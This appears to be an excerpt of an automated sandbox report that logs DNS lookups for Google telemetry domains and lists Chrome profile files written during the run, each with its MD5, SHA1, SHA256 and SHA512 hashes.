US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp

Files

\??\pipe\crashpad_2184_BYSQZHVCJTOPWUVD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 437ef55517ece22b7d723e7473f330a2
SHA1 96b11a6b4d1297b3272969332935936fbe66decc
SHA256 074530f0121400b5d7052fe8b7c59609e32377ef216dd62817ae40f676bcac6a
SHA512 998e1dea12bb2fb5c31b80ebc7ee30e6e0b9b80782ef4bcb41e4e456ce727242d5fd86a59ff30d7eeaf4acf3766b64c00328f104caf935f6ac32239f258247bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 57f0e5a01e3087ecdebd5da31e11ed7b
SHA1 420d29e5c8ae634b722d6d7d93791b6c9be2da70
SHA256 9bcaa6eff04acb9efb18aa2d6758d3ddbb07c784828a4ec53bad8d3a4ec3e1dd
SHA512 c89cc908a3c012e6b9037aa4d4edeb05b13d281fcb544cf3352a33b54f92f177cf352f8d72e36ba397f679d384abfad6e079b81383ecbaf8d95f66198e73cc5b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a7717165b7db7bd34c58ad4b9b9f9040
SHA1 55a6666b4cc0f4b61910eab1d1411c3adb1ce656
SHA256 8b92c4dee42ad9d560d8d54c95c702f46f4d6829d3b3fe7712c98ee779faebad
SHA512 4fe59df97aa772447632b5f7ee9a6d5379a16a9e380db2a9aade25109a92b0beafe0d0f68a1b64feed13f07981b18c091edbfe777bf53b60196d3c0a1ebfdc42